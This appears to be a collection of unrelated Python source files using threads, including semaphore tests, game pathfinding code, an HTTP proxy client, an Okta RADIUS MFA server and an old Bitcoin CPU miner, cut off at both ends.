# signals using signal.signal directly. For now, the implementation is
# hard-coded for the `asyncio.unix_events._UnixSelectorEventLoop`.
# No WINCH? Then don't do anything.
sigwinch = getattr(signal, "SIGWINCH", None)
if sigwinch is None or not in_main_thread():
yield
return
# Keep track of the previous handler.
# (Only UnixSelectorEventloop has `_signal_handlers`.)
loop = asyncio.get_event_loop()
previous_winch_handler = getattr(loop, "_signal_handlers", {}).get(sigwinch)
try:
loop.add_signal_handler(sigwinch, handler)
yield
finally:
# Restore the previous signal handler.
loop.remove_signal_handler(sigwinch)
if previous_winch_handler is not None:
loop.add_signal_handler(
sigwinch,
previous_winch_handler._callback,
*previous_winch_handler._args,
)
|
asynchronous.py
|
import threading
def asynchronously(callback):
def _wrapped(*args, **kwargs):
thread = threading.Thread(target=callback, args=args, kwargs=kwargs, daemon=True)
thread.start()
return {}
return _wrapped
|
test_semaphore.py
|
import unittest
from typing import Callable, List
from threading import Thread
from tests.tests_utils import check_message
from homework.homework6.semaphore import Semaphore
def run_threads(number_of_threads: int, function: Callable):
threads = [Thread(target=function) for _ in range(number_of_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class SemaphoreRaisesTestCase(unittest.TestCase):
def test_incorrect_semaphore_size(self):
with self.assertRaises(ValueError) as context:
Semaphore(-206)
self.assertTrue(check_message(context, "Semaphore initial size must be >= 0"))
class SemaphoreIncrementTestCase(unittest.TestCase):
def setUp(self) -> None:
self.semaphore = Semaphore()
self.count = 0
def increment(self):
for i in range(100_000):
with self.semaphore:
self.count += 1
def increment_with_long_critical_section(self):
with self.semaphore:
for i in range(100_000):
self.count += 1
def test_increment_1_thread(self):
run_threads(1, self.increment)
self.assertEqual(self.count, 100_000)
def test_increment_10_threads(self):
run_threads(10, self.increment)
self.assertEqual(self.count, 100_000 * 10)
def test_increment_with_long_critical_section_1_thread(self):
run_threads(1, self.increment_with_long_critical_section)
self.assertEqual(self.count, 100_000)
def test_increment_with_long_critical_section_10_threads(self):
run_threads(10, self.increment_with_long_critical_section)
self.assertEqual(self.count, 100_000 * 10)
class SemaphoreSquareTestCase(unittest.TestCase):
def setUp(self) -> None:
self.semaphore = Semaphore()
self.numbers: List[int] = []
self.result: List[int] = []
def square(self):
while True:
with self.semaphore:
if self.numbers:
self.result.append(self.numbers.pop(0) ** 2)
else:
return
def test_1_number_1_thread(self):
self.numbers.append(104)
run_threads(1, self.square)
self.assertEqual(self.result, [104 ** 2])
def test_1_number_10_threads(self):
self.numbers.append(172)
run_threads(10, self.square)
self.assertEqual(self.result, [172 ** 2])
def test_many_numbers_1_thread(self):
self.numbers.extend(range(100_000))
run_threads(1, self.square)
self.assertEqual(self.result, list(map(lambda x: x ** 2, range(100_000))))
def test_many_numbers_10_thread(self):
self.numbers.extend(range(100_000))
run_threads(10, self.square)
self.assertEqual(self.result, list(map(lambda x: x ** 2, range(100_000))))
|
ContentWorker.py
|
from app.api.engines.ContentEngine import ContentEngine
from multiprocessing import Process
class ContentWorker(object):
def _start_process(self, target, args):
process = Process(target=target, args=args)
process.daemon = True
process.start()
def train_item(self, item_id):
self._start_process(ContentEngine().train_item, (item_id, ))
def train(self):
self._start_process(ContentEngine().train, ())
|
ai.py
|
from direct.showbase.DirectObject import DirectObject
from pandac.PandaModules import *
from random import randint, random, choice
import math
import sys
import engine
import entities
import net
import components
import controllers
import threading
import time
ACCURACY = 0.7 # Relative probability of an AI droid hitting its target.
currentWorld = None
pathRequests = []
pathFindThread = None
class PathRequest:
def __init__(self, callback, aiNode, targetAiNode, position, targetPosition, radius):
self.callback = callback
self.aiNode = aiNode
self.targetAiNode = targetAiNode
self.position = position
self.targetPosition = targetPosition
self.radius = radius
def init():
global pathFindThread
pathFindThread = threading.Thread(target = pathWorker)
pathFindThread.setDaemon(True)
pathFindThread.start()
def pathWorker():
global pathRequests, currentWorld
while True:
if len(pathRequests) > 0:
req = pathRequests.pop(0)
req.callback(currentWorld.navMesh.findPathFromNodes(req.aiNode, req.targetAiNode, req.position, req.targetPosition, req.radius))
del req
if len(pathRequests) > 5:
del pathRequests[:]
time.sleep(0.01)
def requestPath(callback, aiNode, targetAiNode, position, targetPosition, radius):
request = PathRequest(callback, aiNode, targetAiNode, position, targetPosition, radius)
pathRequests.append(request)
class World:
"""The AI world models the world using a navigation mesh. AI entities navigate between edges in the mesh using an A* search algorithm.
The AI world also contains the ODE world and space, and includes functions to test for collisions."""
def __init__(self):
global currentWorld
currentWorld = self
"Initializes the ODE world and space."
self.grids = dict()
self.navMesh = None
self.spawnPoints = []
self.docks = []
if base.cTrav == 0:
self.traverser = CollisionTraverser("collision_traverser")
base.cTrav = self.traverser
else:
self.traverser = base.cTrav
self.traverser.clearColliders()
# Setup the physics world
self.world = OdeWorld()
# Create a space and add a contactgroup to it to add the contact joints
self.space = OdeHashSpace()
self.space.setAutoCollideWorld(self.world)
self.contactGroup = OdeJointGroup()
self.space.setAutoCollideJointGroup(self.contactGroup)
self.space.setCollisionEvent("physicsCollision")
self.world.setGravity(0, 0, -35)
# Surface IDs: 0 - ground 1 - objects 2 - actors
self.world.initSurfaceTable(3)
self.world.setSurfaceEntry(0, 1, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(1, 1, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(1, 2, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(0, 2, 10.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(2, 2, 0.2, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
self.world.setSurfaceEntry(0, 0, 1.0, 0.3, 7, 0.9, 0.00001, 0.0, 0.01)
def update(self):
"Steps the ODE simulation."
self.space.autoCollide()
self.world.quickStep(engine.clock.timeStep)
self.contactGroup.empty() # Clear the contact joints
def getNearestDroid(self, entityGroup, pos):
"Gets an entity on any opposing team with the smallest straight-line distance from the specified position."
distance = -1
droid = None
for entity in (x for x in entityGroup.entities.values() if isinstance(x, entities.BasicDroid)):
vector = pos - entity.getPosition()
if vector.length() < distance or distance == -1:
distance = vector.length()
droid = entity
return droid
def getNearestEnemy(self, entityGroup, pos, team, includeCloakedUnits = False):
"Gets an entity on any opposing team with the smallest straight-line distance from the specified position."
distance = -1
enemy = None
for entity in (x for x in entityGroup.entities.values() if isinstance(x, entities.BasicDroid) and ((not x.cloaked) or includeCloakedUnits) and (not team.isAlly(x.getTeam()))):
vector = pos - entity.getPosition()
if vector.length() < distance or distance == -1:
distance = vector.length()
enemy = entity
return enemy
def getNearestDropPod(self, entityGroup, pos):
"Gets the nearest drop pod."
distance = -1
pod = None
for entity in (x for x in entityGroup.entities.values() if isinstance(x, entities.DropPod)):
vector = pos - entity.getPosition()
if vector.length() < distance or distance == -1:
distance = vector.length()
pod = entity
return pod
def getNearestSpawnPoint(self, pos):
lowestDistance = -1
returnValue = None
for point in self.spawnPoints:
vector1 = pos - point.getPosition()
dist = vector1.length()
if dist < lowestDistance or lowestDistance == -1:
lowestDistance = dist
returnValue = point
return returnValue
def getNearestDock(self, pos):
lowestDistance = -1
returnValue = None
for point in self.docks:
vector1 = pos - point.getPosition()
dist = vector1.length()
if dist < lowestDistance or lowestDistance == -1:
lowestDistance = dist
returnValue = point
return returnValue
def getNearestOpenSpawnPoint(self, team, entityGroup, pos, minRadius = 50):
dockList = [team.dock] if team.dock != None else []
points = sorted(dockList + self.spawnPoints, key = lambda x: (x.getPosition() - pos).length())
enemies = [x for x in entityGroup.entities.values() if isinstance(x, entities.Actor) and x.getTeam() != team]
for point in points:
p = point.getPosition()
open = True
for enemy in enemies:
if (enemy.getPosition() - p).length() < minRadius:
open = False
break
if open:
return p
return points[0].getPosition()
def getRandomSpawnPoint(self, zombieSpawnsOnly = False, team = None):
if zombieSpawnsOnly:
spawns = self.spawnPoints[1:]
else:
spawns = self.spawnPoints[:]
if team != None and team.dock != None:
spawns.append(team.dock)
return choice(spawns).getPosition()
def getRandomOpenSpawnPoint(self, team, entityGroup, minRadius = 50, zombieSpawnsOnly = False):
if zombieSpawnsOnly:
spawns = self.spawnPoints[1:]
else:
spawns = self.spawnPoints[:]
if team != None and team.dock != None:
spawns.append(team.dock)
goodSpawns = []
enemies = [x for x in entityGroup.entities.values() if isinstance(x, entities.Actor) and x.getTeam() != team]
for point in spawns:
p = point.getPosition()
open = True
for enemy in enemies:
if (enemy.getPosition() - p).length() < minRadius:
open = False
break
if open:
goodSpawns.append(point)
if len(goodSpawns) == 0:
return spawns[0].getPosition()
else:
return choice(goodSpawns).getPosition()
def getRayCollisionQueue(self, rayNP, node = None):
"""Gets a CollisionHandlerQueue containing all collisions along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
queue = CollisionHandlerQueue()
self.traverser.addCollider(rayNP, queue)
if node == None:
self.traverser.traverse(engine.renderLit)
else:
self.traverser.traverse(node)
self.traverser.clearColliders()
queue.sortEntries()
return queue
def getCollisionQueue(self, position, direction, node = None):
"""Gets a CollisionHandlerQueue containing all collisions along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
cNode = CollisionNode("cnode")
nodepath = render.attachNewNode(cNode)
cNode.setIntoCollideMask(BitMask32(0))
cNode.setFromCollideMask(BitMask32(1))
ray = CollisionRay(position.getX(), position.getY(), position.getZ(), direction.getX(), direction.getY(), direction.getZ())
cNode.addSolid(ray)
queue = CollisionHandlerQueue()
self.traverser.addCollider(nodepath, queue)
if node == None:
self.traverser.traverse(engine.renderLit)
else:
self.traverser.traverse(node)
self.traverser.clearColliders()
nodepath.removeNode()
queue.sortEntries()
return queue
def getRayFirstCollision(self, rayNP, node = None):
"""Gets a CollisionEntry for the first collision along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
queue = self.getRayCollisionQueue(rayNP, node)
if queue.getNumEntries() > 0:
return queue.getEntry(0)
else:
return None
def getFirstCollision(self, position, direction, node = None):
"""Gets a CollisionEntry for the first collision along the specified ray.
Only checks for collisions with the specified NodePath, if one is given."""
queue = self.getCollisionQueue(position, direction, node)
if queue.getNumEntries() > 0:
return queue.getEntry(0)
else:
return None
def testCollisions(self, node, traversePath = None):
if traversePath == None:
traversePath = engine.renderLit
"Tests for any and all collisions on the specified nodepath."
queue = CollisionHandlerQueue()
self.traverser.addCollider(node, queue)
self.traverser.traverse(traversePath)
self.traverser.clearColliders()
queue.sortEntries()
return queue
def delete(self):
"Destroys the ODE world. IMPORTANT: do not delete the AI world before deleting the entity group."
for point in self.spawnPoints:
point.delete()
del self.spawnPoints[:]
for dock in self.docks:
dock.delete()
del self.docks[:]
if self.navMesh != None:
self.navMesh.delete()
self.world.destroy()
self.space.destroy()
navMeshCache = dict()
class NavMesh:
def __init__(self, directory, filename):
global navMeshCache
self.edges = []
self.nodes = []
self.filename = filename
if directory + "/" + self.filename in navMeshCache:
navMesh = navMeshCache[directory + "/" + self.filename]
self.edges = navMesh.edges
self.nodes = navMesh.nodes
else:
node = engine.loadModel(directory + "/" + self.filename)
self._processNode(node)
node.removeNode()
navMeshCache[directory + "/" + self.filename] = self
def delete(self):
pass
def _processNode(self, node):
geomNodeCollection = node.findAllMatches('**/+GeomNode')
for nodePath in geomNodeCollection:
geomNode = nodePath.node()
self._processGeomNode(geomNode)
for edge in self.edges:
if len(edge.nodes) <= 1:
# This edge isn't between two nodes, so we don't need to worry about it when pathfinding.
# But we still need it for determining which node an agent is in.
edge.navigable = False
def _processGeomNode(self, geomNode):
for i in range(geomNode.getNumGeoms()):
geom = geomNode.getGeom(i)
state = geomNode.getGeomState(i)
self._processGeom(geom)
def _processGeom(self, geom):
vdata = geom.getVertexData()
for i in range(geom.getNumPrimitives()):
prim = geom.getPrimitive(i)
self._processPrimitive(prim, vdata)
def _processPrimitive(self, prim, vdata):
vertex = GeomVertexReader(vdata, "vertex")
prim = prim.decompose()
def getVertex(index):
vi = prim.getVertex(index)
vertex.setRow(vi)
return vertex.getData3f()
for p in range(prim.getNumPrimitives()):
s = prim.getPrimitiveStart(p)
e = prim.getPrimitiveEnd(p)
for i in range(s, e):
v = getVertex(i)
if i + 1 >= e:
break
v2 = getVertex(i + 1)
edge1 = self.addEdge(v, v2)
if i + 2 >= e:
break
v3 = getVertex(i + 2)
edge2 = self.addEdge(v2, v3)
edge3 = self.addEdge(v3, v)
self.nodes.append(NavNode(edge1, edge2, edge3))
def addEdge(self, v1, v2):
edge = self._checkForEdge(v1, v2)
if edge == None:
edge = Edge(Vec3(v1), Vec3(v2))
self.edges.append(edge)
return edge
def _checkForEdge(self, v1, v2):
epsilon = 0.1
for edge in self.edges:
if (edge.a.almostEqual(v1, epsilon) and edge.b.almostEqual(v2, epsilon)) or (edge.a.almostEqual(v2, epsilon) and edge.b.almostEqual(v1, epsilon)):
return edge
return None
def getNode(self, pos, radius = 1, lastKnownNode = None):
if lastKnownNode != None:
if lastKnownNode.containerTest(pos, radius):
return lastKnownNode
nodes = []
for edge in lastKnownNode.edges:
nodes += [x for x in edge.getNodes() if x != lastKnownNode and x.containerTest(pos, radius)]
if len(nodes) == 0:
nodes = [x for x in self.nodes if x.containerTest(pos, radius)]
else:
nodes = [x for x in self.nodes if x.containerTest(pos, radius)]
size = len(nodes)
if size == 0:
return None
if size > 1:
highest = -100
highestNode = None
for node in nodes:
if node.highest > highest and node.lowest < pos.getZ():
highest = node.highest
highestNode = node
return highestNode
return nodes[0]
def findPath(self, startPos, endPos, radius = 1):
"A* algorithm."
startNode = self.getNode(startPos, radius)
endNode = self.getNode(endPos, radius)
return self.findPathFromNodes(startNode, endNode, startPos, endPos, radius)
def findPathFromNodes(self, startNode, endNode, startPos, endPos, radius = 1):
# Clear pathfinding data
for edge in self.edges:
edge.closed = False
edge.cameFrom = None
edge.gScore = 0
edge.hScore = 0
edge.fScore = 0
edge.open = False
path = Path(startPos, endPos, startNode, endNode, radius)
openEdges = startNode.edges[:]
for edge in startNode.edges:
edge.gScore = 0
edge.hScore = edge.cost(endNode.center)
edge.fScore = edge.hScore
edge.open = True
def compare(x, y):
return (x.fScore > y.fScore) - (x.fScore < y.fScore)
iterations = 0
while len(openEdges) > 0:
openEdges.sort(compare)
currentEdge = openEdges.pop(0)
if endNode in currentEdge.nodes:
c = currentEdge
path.add(currentEdge)
while c.cameFrom != None:
c = c.cameFrom
path.add(c)
path.clean()
return path
currentEdge.closed = True
for neighbor in currentEdge.neighbors:
if neighbor.navigable and not neighbor.closed:
tentativeGScore = currentEdge.gScore + currentEdge.costToEdge(neighbor)
tentativeIsBetter = False
if not neighbor.open:
neighbor.open = True
openEdges.append(neighbor)
neighbor.hScore = neighbor.cost(endNode.center)
tentativeIsBetter = True
elif tentativeGScore < neighbor.gScore:
tentativeIsBetter = True
if tentativeIsBetter:
neighbor.cameFrom = currentEdge
neighbor.gScore = tentativeGScore
neighbor.fScore = neighbor.gScore + neighbor.hScore
iterations += 1
if iterations > 9:
time.sleep(0.0)
iterations = 0
return None
class NavNode:
def __init__(self, edge1, edge2, edge3):
self.highest = -10000
self.lowest = 10000
self.edges = []
self.edgeNormals = [] # For containerTest
self.center = Vec3()
for e in [edge1, edge2, edge3]:
self._addEdge(e)
for edge in self.edges:
self.center += edge.a + edge.b
self.center /= len(self.edges) * 2 # Node center is only calculated once.
up = Vec3(0, 0, 1)
for edge in self.edges:
toCenter = edge.center - self.center
toCenter.setZ(0)
toCenter.normalize()
parallel = Vec3(edge.a.getX(), edge.a.getY(), 0) - Vec3(edge.b.getX(), edge.b.getY(), 0)
parallel.setZ(0)
parallel.normalize()
normal = parallel.cross(up)
reverseNormal = normal * -1
if toCenter.dot(normal) < 0:
self.edgeNormals.append(normal)
else:
self.edgeNormals.append(reverseNormal)
def containerTest(self, p, radius = 1):
p2 = Vec3(p.getX(), p.getY(), 0)
if p.getZ() > self.highest + radius + 1 or p.getZ() < self.lowest - radius - 1:
return False
for i in range(len(self.edgeNormals)):
vector = p2 - self.edges[i].flatCenter
vector.normalize()
if vector.dot(self.edgeNormals[i]) < 0:
return False
# To do: vertical test
return True
def _addEdge(self, edge):
if not edge in self.edges:
if edge.a.getZ() < self.lowest:
self.lowest = edge.a.getZ()
if edge.b.getZ() < self.lowest:
self.lowest = edge.b.getZ()
if edge.a.getZ() > self.highest:
self.highest = edge.a.getZ()
if edge.b.getZ() > self.highest:
self.highest = edge.b.getZ()
self.edges.append(edge)
edge.addNode(self)
for e in (x for x in self.edges if x != edge):
edge.addNeighbor(e)
e.addNeighbor(edge)
class Edge:
def __init__(self, v1, v2):
self.a = v1
self.b = v2
self.aToBVector = self.b - self.a
self.aToBVector.normalize()
self.center = (self.a + self.b) / 2
self.flatCenter = Vec3(self.center.getX(), self.center.getY(), 0)
self.neighbors = []
self.nodes = []
# Temporary pathfinding data
self.closed = False
self.open = False
self.cameFrom = None
self.gScore = 0
self.hScore = 0
self.fScore = 0
self.navigable = True
def intersects(self, c, d, radius = 0):
def ccw(u,v,w):
return (w.getY() - u.getY()) * (v.getX() - u.getX()) > (v.getY() - u.getY()) * (w.getX() - u.getX())
a = self.a + (self.aToBVector * radius)
b = self.b - (self.aToBVector * radius)
return ccw(a, c, d) != ccw(b, c, d) and ccw(a, b, c) != ccw(a, b, d)
def addNode(self, node):
if node not in self.nodes:
self.nodes.append(node)
def cost(self, pos):
# The cost is the distance from given point to the closer of our two corners.
dist1 = (self.a - pos).length()
dist2 = (self.b - pos).length()
return min(dist1, dist2)
def costToEdge(self, edge):
# The cost is the distance between the two closest corners of the two edges.
dist1 = (self.a - edge.a).length()
dist2 = (self.b - edge.b).length()
dist3 = (self.a - edge.b).length()
dist4 = (self.b - edge.a).length()
return min(dist1, dist2, dist3, dist4)
def getNodes(self):
return self.nodes
def addNeighbor(self, e):
if not e in self.neighbors:
self.neighbors.append(e)
def getNeighbors(self):
return self.neighbors
class Path:
def __init__(self, start = None, end = None, startNode = None, endNode = None, radius = 0):
self.waypoints = []
self.edges = []
self.nodes = []
if startNode != None and endNode != None:
self.nodes = [endNode, startNode]
self.radius = radius
if start == None:
self.start = None
self.end = None
else:
self.start = Vec3(start)
self.end = Vec3(end)
def clean(self):
i = len(self.waypoints) - 2
while i > 0:
if self.edges[i].intersects(self.waypoints[i - 1], self.waypoints[i + 1], self.radius):
del self.waypoints[i]
del self.edges[i]
i -= 1
def add(self, edge):
self.edges.insert(0, edge)
if len(self.edges) > 1:
for node in edge.nodes:
if node in self.edges[1].nodes:
self.nodes.insert(1, node)
aDist = (edge.a - self.end).length()
bDist = (edge.b - self.end).length()
if len(self.waypoints) > 1:
last = self.waypoints[1]
aDist += (edge.a - last).length()
bDist += (edge.b - last).length()
if aDist < bDist:
self.waypoints.insert(0, edge.a + (edge.aToBVector * self.radius))
else:
self.waypoints.insert(0, edge.b - (edge.aToBVector * self.radius))
def current(self):
if len(self.waypoints) > 0:
return self.waypoints[0]
else:
return None
def next(self):
if len(self.waypoints) > 0:
self.waypoints.pop(0)
return self.current()
def hasNext(self):
return len(self.waypoints) > 1
def last(self):
if len(self.waypoints) > 0:
return self.waypoints[len(self.waypoints) - 1]
else:
return None
def clear(self):
del self.waypoints[:]
del self.nodes[:]
del self.edges[:]
|
_re.py
|
import queue
import threading
import time
a = [1, 2, 3]
q = queue.Queue()
q.put(1)
q.put('abc')
# q.put(a)
print(q.get())
print(q.get())
# print(q.get())
def handle(q:queue.Queue):
time.sleep(5)
q.put('xyz')
t = threading.Thread(target =handle,args = (q,))
t. start() # 启动
print(q.get()) # empty
|
client.py
|
#!/usr/bin/env python3
#
# The MIT License (MIT)
#
# Copyright shifvb 2015-2016
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import socket
import threading
import logging
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from http_proxy.tools.encrypt import encrypt
from http_proxy.tools.async_IO import read_write
from http_proxy.tools.parse_head import parse_head
from http_proxy.utils import parse_args
from http_proxy.utils import check_ver
from http_proxy.utils import get_time_str
BUFFER_SIZE = 4096
is_local = True
__version__ = (0, 9, 2)
def handle_request(client_sock, server_addr: str, server_port: int):
try:
# receive data from client(i.e. browser)
head_data = client_sock.recv(BUFFER_SIZE)
if not head_data:
client_sock.close()
return
parse_head(head_data) # show debug message
encrypted_data = encrypt(head_data) # encrypt data
target_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send encrypted data to server
target_sock.connect((server_addr, server_port))
target_sock.send(encrypted_data)
read_write(client_sock, target_sock) # async communication
target_sock.close() # close socket
except TimeoutError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' time out.'))
except ConnectionAbortedError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' was aborted by client.'))
except ConnectionResetError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' was reseted.'))
except ConnectionRefusedError:
logging.warning('[WARN] [{}] {:>61}'.format(get_time_str(), "link to " + server_addr + ' was refused.'))
except socket.gaierror:
logging.error('[ERR] [{}] {:>61}'.format(get_time_str(), "can't CONNECT to server!"))
finally:
client_sock.close()
def client(server_addr: str, server_port: int, local_addr: str, local_port: int):
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.bind((local_addr, local_port))
client_sock.listen(5)
while True:
conn, addr = client_sock.accept()
t = threading.Thread(target=handle_request, args=(conn, server_addr, server_port))
t.daemon = True
t.start()
if __name__ == '__main__':
check_ver()
d = parse_args(is_local, __version__)
print('Target server: {}:{}'.format(d["server_addr"], d["server_port"]))
print('Client listening on {}:{}'.format(d["local_addr"], d["local_port"]))
client(**d)
|
server.py
|
#!/usr/bin/python
from __future__ import print_function
from pyrad.dictionary import Dictionary
from pyrad.server import Server, RemoteHost
from pyrad.packet import AccessReject, AccessAccept
import logging
from okta import OktaAPI, ResponseCodes
import os
import sys
import threading
logging.basicConfig(level="INFO",
format="%(asctime)s [%(levelname)-8s] %(message)s")
logger = logging.getLogger(__name__)
class RadiusServer(Server):
def __init__(self, *args, **kwargs):
self.okta = OktaAPI(url=args[0], key=args[1])
super().__init__(**kwargs)
def auth_handler(self, pkt):
user_name = pkt["User-Name"][0][
pkt["User-Name"][0].find("\\") + 1 if pkt["User-Name"][0].find("\\") > 0 else 0:]
logger.info("Received an authentication request for {}.".format(user_name))
logger.debug("Attributes: ")
for attr in pkt.keys():
logger.debug("%s: %s" % (attr, pkt[attr]))
reply = self.CreateReplyPacket(pkt, **{
"Proxy-State": pkt["Proxy-State"]
})
reply.code = AccessReject
try:
if os.environ.get('OKTA_USE_SAMACCOUNTNAME'):
u = self.okta.get_user_by_samaccountname(user_name)
else:
u = self.okta.get_user_id(user_name)
f = self.okta.get_user_push_factor(u)
if f is not None:
push = self.okta.push_verify(u, f["id"])
if push == ResponseCodes.SUCCESS:
logger.info("Push approved by {}.".format(user_name))
reply.code = AccessAccept
else:
logger.warning("Push was rejected or timed out for {}!".format(user_name))
else:
push = self.okta.push_async_mfa(u)
if push == ResponseCodes.SUCCESS:
logger.info("Push approved by {}.".format(user_name))
reply.code = AccessAccept
else:
logger.warning("Push was rejected or timed out for {}!".format(user_name))
except Exception as e:
logger.exception("There was a problem with the Okta MFA", e)
self.SendReplyPacket(pkt.fd, reply)
def HandleAuthPacket(self, pkt):
thread = threading.Thread(target=self.auth_handler, args=(pkt, ))
thread.start()
def run():
# Check to make sure env variables are set
if not all(v in os.environ for v in ["OKTA_API_KEY", "OKTA_TENANT", "RADIUS_SECRET", "RADIUS_PORT", "OKTA_WKF_ASYNC_MFA_CREATE_TRANSACTION_URL", "OKTA_WKF_ASYNC_MFA_POLL_TRANSACTION_URL"]):
logger.error("Missing environment variables!")
sys.exit("Missing environment variables!")
# Create server and read the attribute dictionary
srv = RadiusServer(
os.getenv('OKTA_TENANT'),
os.getenv('OKTA_API_KEY'),
dict=Dictionary("dictionary"),
coa_enabled=False,
authport=int(os.getenv('RADIUS_PORT'))
)
# Add clients (address, secret, name)
srv.hosts["0.0.0.0"] = RemoteHost("0.0.0.0", os.getenv("RADIUS_SECRET").encode(), "0.0.0.0")
srv.BindToAddress("")
logger.info("Starting server...")
# Run the RADIUS server
srv.Run()
if __name__ == '__main__':
run()
|
test24.py
|
from threading import get_ident, Thread
import time
# 自定义字典实现
storage = {}
def set(k, v):
ident = get_ident()
if ident in storage:
storage[ident][k] = v
else:
storage[ident] = {k: v}
def get(k):
ident = get_ident()
return storage[ident][k]
def task(arg):
set('val', arg)
# 实现输出所有的i值
time.sleep(1)
v = get('val')
print(v)
for i in range(10):
t = Thread(target=task, args=(i, ))
t.start()
# 基于函数实现
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
